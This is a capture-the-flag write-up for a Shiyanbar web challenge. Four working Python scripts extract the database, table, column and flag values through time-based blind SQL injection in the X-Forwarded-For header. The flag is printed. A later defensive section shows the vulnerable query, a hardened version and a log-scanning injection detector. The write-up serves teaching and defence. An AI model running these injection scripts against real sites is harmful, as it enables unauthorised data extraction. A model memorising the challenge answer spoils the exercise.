实验吧 WEB: Who are you?

Key concept

Time-based blind SQL injection: the value of the X-Forwarded-For header is concatenated into a query on the server, and a conditional sleep(8) turns every single-character guess into a request that either times out (guess correct) or returns promptly (guess wrong), so data is read out one character at a time through the response timing.

Solution steps

Dump the name of the database currently in use:

#-*-coding:utf-8-*-
import requests
import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate characters tried for each position of the database name
guess = string.ascii_lowercase + string.ascii_uppercase + string.digits + string.punctuation

print('start.')

database_name = ''
for i in range(1, 100):
    flag = 0
    for ch in guess:
        # The header value closes the quoted string, then adds a CASE expression
        # that calls sleep(8) only when character i of the database name equals ch.
        headers = {
            "X-Forwarded-For": "127.0.0.1'+" + "(select case when (substring((select schema_name from information_schema.SCHEMATA where schema_name = database()) from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1" % (i, ch)
        }
        print(headers)
        try:
            # A client timeout shorter than the sleep turns the delay into an exception
            requests.get(url, headers=headers, timeout=7)
        except requests.exceptions.Timeout:
            database_name += ch
            flag = 1
            print('database.', database_name)
            break
    if flag == 0:
        # No candidate matched at this position: the name is complete
        break

print(database_name)

Output:

web4

Dump the table names in web4:

#-*-coding:utf-8-*-
import requests
import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate characters tried for each position of the table list
guess = string.ascii_lowercase + string.digits + string.punctuation + string.ascii_uppercase

print('start.')

tables = ''
for i in range(1, 100):
    flag = 0
    for ch in guess:
        # group_concat joins all table names of web4 with '@' so one string
        # can be extracted character by character
        headers = {
            "X-Forwarded-For": "127.0.0.1'+" + "(select case when (substring((select group_concat(table_name separator '@') from information_schema.tables where table_schema = 'web4') from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1" % (i, ch)
        }
        print(headers)
        try:
            requests.get(url, headers=headers, timeout=7)
        except requests.exceptions.Timeout:
            tables += ch
            flag = 1
            print('tables', tables)
            break
    if flag == 0:
        # No candidate matched at this position: the list is complete
        break

print(tables)

Output:

client_ip@flag

Dump the column names of the flag table:

#-*-coding:utf-8-*-
import requests
import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate characters tried for each position of the column list
guess = string.ascii_lowercase + string.digits + string.punctuation + string.ascii_uppercase

print('start.')

columns = ''
for i in range(1, 100):
    flag = 0
    for ch in guess:
        # Same probe as before, now over the columns of the flag table
        headers = {
            "X-Forwarded-For": "127.0.0.1'+" + "(select case when (substring((select group_concat(column_name separator '@') from information_schema.columns where table_name = 'flag') from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1" % (i, ch)
        }
        print(headers)
        try:
            requests.get(url, headers=headers, timeout=7)
        except requests.exceptions.Timeout:
            columns += ch
            flag = 1
            print('columns', columns)
            break
    if flag == 0:
        print('finished.')
        break

print(columns)

Output:

flag

Dump the flag:

#-*-coding:utf-8-*-
import requests
import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate characters tried for each position of the flag value
guess = string.ascii_lowercase + string.digits + string.punctuation + string.ascii_uppercase

print('start.')

f = ''
for i in range(1, 100):
    flag = 0
    for ch in guess:
        # Same probe as before, now reading the flag column of the flag table
        headers = {
            "X-Forwarded-For": "127.0.0.1'+" + "(select case when (substring((select flag from flag) from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1" % (i, ch)
        }
        print(headers)
        try:
            requests.get(url, headers=headers, timeout=7)
        except requests.exceptions.Timeout:
            f += ch
            flag = 1
            print(f)
            break
    if flag == 0:
        print('finished.')
        break

print(f)

Output:

cdbf14c9551d5be5612f7bb5d2867853

flag:

ctf{cdbf14c9551d5be5612f7bb5d2867853}
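The four scripts above all exploit the same root cause: the X-Forwarded-For value is formatted into an INSERT as raw SQL text. The following is an added example (not the challenge's code, and not the author's scripts) that shows, from the defending side, why the concatenated statement is injectable, how validating the header as an IP literal and binding it as a query parameter closes the hole, and how a time-based probe of this shape can be spotted in proxy logs. The table name client_ip comes from the writeup's output; the log format, the rt= response-time field, the hop-list handling in normalize_client_ip and the use of an in-memory SQLite table as a stand-in for the MySQL one are assumptions made for this example.

```python
import ipaddress
import re
import sqlite3

# Constructed header value in the shape the writeup sends: a closing quote,
# a CASE expression that calls sleep() when one guessed character matches,
# and a tail that keeps the statement syntactically valid.
PAYLOAD = ("127.0.0.1'+(select case when (substring(database() from 1 for 1)='w') "
           "then sleep(8) else 1 end) and '1'='1")


def vulnerable_query(xff):
    """The pattern the affected page must be using (assumed, not its source):
    the raw header value is formatted straight into the SQL text, so the
    payload above becomes part of the statement."""
    return "INSERT INTO client_ip (ip) VALUES ('%s')" % xff


def normalize_client_ip(xff):
    """Hardened input handling (assumed design). X-Forwarded-For may carry a
    comma-separated hop list; every hop must parse as an IP literal and the
    first hop is returned. Anything else raises ValueError, so SQL text can
    never reach the query."""
    hops = [h.strip() for h in xff.split(",")]
    parsed = [ipaddress.ip_address(h) for h in hops]   # ValueError on junk
    return str(parsed[0])


def new_db():
    """In-memory SQLite stand-in for the challenge's client_ip table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (ip TEXT)")
    return conn


def store_client_ip(conn, xff):
    """Hardened insert: the validated value is bound as a parameter, never
    concatenated, so even a value that passed validation is data, not SQL."""
    ip = normalize_client_ip(xff)
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (ip,))
    conn.commit()
    return ip


def stored_ips(conn):
    return [row[0] for row in conn.execute("SELECT ip FROM client_ip")]


# --- detection over access logs -------------------------------------------
# Constructed log format (assumed): the proxy records the X-Forwarded-For
# value and the upstream response time in seconds as xff="..." rt=...
LOG_LINES = [
    '10.0.0.5 - [01/Jan/2024:12:00:00] "GET /index.php HTTP/1.1" 200 xff="203.0.113.9" rt=0.02',
    '10.0.0.5 - [01/Jan/2024:12:00:01] "GET /index.php HTTP/1.1" 200 xff="203.0.113.9, 10.0.0.5" rt=0.03',
    '10.0.0.5 - [01/Jan/2024:12:00:09] "GET /index.php HTTP/1.1" 200 xff="' + PAYLOAD + '" rt=8.01',
    '10.0.0.5 - [01/Jan/2024:12:00:10] "GET /index.php HTTP/1.1" 200 xff="unknown" rt=0.02',
]

SQLI_MARKERS = re.compile(r"\b(sleep|benchmark)\s*\(|information_schema|\bcase\s+when\b", re.I)
LOG_FIELDS = re.compile(r'xff="(?P<xff>[^"]*)"\s+rt=(?P<rt>[0-9.]+)')


def classify_xff(value):
    """'ok' for a valid IP or hop list, 'sqli' when injection markers are
    present, 'malformed' for any other non-IP value."""
    try:
        normalize_client_ip(value)
        return "ok"
    except ValueError:
        pass
    return "sqli" if SQLI_MARKERS.search(value) else "malformed"


def scan_log(lines, slow_threshold=5.0):
    """Return (line_number, verdict, slow) per parsable line. A time-based
    probe shows up twice: the header fails validation, and on a correct
    guess the response time jumps by the sleep() duration."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_FIELDS.search(line)
        if not m:
            continue
        slow = float(m.group("rt")) >= slow_threshold
        findings.append((n, classify_xff(m.group("xff")), slow))
    return findings


if __name__ == "__main__":
    print(vulnerable_query(PAYLOAD))
    for finding in scan_log(LOG_LINES):
        print(finding)
```

The validation step alone would already have stopped this challenge, since no character of the probe survives ipaddress.ip_address; the parameter binding is the defence that holds even if the validation is loosened later. Which hop of X-Forwarded-For to trust is a separate decision that depends on which proxy appended it; the example simply takes the first.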
